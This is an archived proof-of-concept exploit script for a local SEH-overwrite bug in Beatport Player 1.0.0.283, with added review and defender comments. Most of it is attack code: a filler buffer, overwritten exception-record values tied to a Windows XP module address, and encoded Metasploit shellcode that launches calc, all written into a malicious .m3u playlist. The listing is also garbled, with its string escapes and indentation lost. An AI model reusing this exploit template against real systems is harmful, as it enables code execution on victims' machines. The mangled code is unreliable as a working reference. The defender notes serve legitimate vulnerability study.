# Title : Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit
# Published : 2009-05-01
# Author : His0k4
#usage: exploit.py
# Grab the exploit file into the program
#
# Proof-of-concept generator (Python 2 syntax) for the local SEH-overwrite bug
# named in the title: it concatenates four strings and writes the result to
# "exploit.m3u" in the current directory. The script does no network I/O; the
# file only has an effect when it is opened in the affected player.
# NOTE(review): as archived on this page the listing is not valid Python -- the
# string escapes and the try/except indentation appear to have been lost in
# extraction. The code is kept verbatim.
#
# Defender notes:
#  - A playlist is normally short text lines (paths/URLs). One entry well over
#    1 KB made of a single repeated byte followed by binary data is a simple
#    anomaly to flag in file scanning.
#  - The handler value below is a hard-coded address attributed to a system
#    module, so the PoC is tied to the tested build (Windows XP Pro SP3 EN per
#    the banner). Presumably it relies on that module lacking SafeSEH and on the
#    absence of SEHOP/ASLR -- confirm against the target before relying on this.

# Banner only; none of these lines affect the generated file.
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploitn"
print " Refer: http://www.milw0rm.com/exploits/8588n"
print " Exploit code: His0k4n"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " greetz: TO ELITE ALGERIANS,snakespc.comn"
print "**************************************************************************"
# Filler repeated 1232 times; presumably the distance from the start of the
# copied playlist entry to the exception record on the tested build (TODO confirm).
buff = "x41" * 1232
# Value placed over the exception record's "next" field (per the variable name).
next_seh = "xEBx06x90x90"
# Value placed over the record's handler pointer; the author's note attributes
# the address to msacm32.drv.
seh = "xB8x15xD1x72" #msacm32.drv
# Per the generator comment below, the payload is Metasploit's win32_exec with
# CMD=calc (160 bytes, encoded) -- the usual harmless proof-of-execution marker.
# The bytes are opaque here and were not decoded for this review.
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe8"
"x61xfbx36x83xebxfcxe2xf4x14x89xbfx36xe8x61x70x73"
"xd4xeax87x33x90x60x14xbdxa7x79x70x69xc8x60x10x7f"
"x63x55x70x37x06x50x3bxafx44xe5x3bx42xefxa0x31x3b"
"xe9xa3x10xc2xd3x35xdfx32x9dx84x70x69xccx60x10x50"
"x63x6dxb0xbdxb7x7dxfaxddx63x7dx70x37x03xe8xa7x12"
"xecxa2xcaxf6x8cxeaxbbx06x6dxa1x83x3ax63x21xf7xbd"
"x98x7dx56xbdx80x69x10x3fx63xe1x4bx36xe8x61x70x5e"
"xd4x3excaxc0x88x37x72xcex6bxa1x80x66x80x91x71x32"
"xb7x09x63xc8x62x6fxacxc9x0fx02x9ax5ax8bx61xfbx36")
# File layout: filler, then the two exception-record fields, then the payload.
exploit = buff + next_seh + seh + shellcode
# Write the single-entry playlist, then wait for Enter (raw_input) so the
# message stays visible. The bare except hides the actual failure and prints
# only "Error".
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"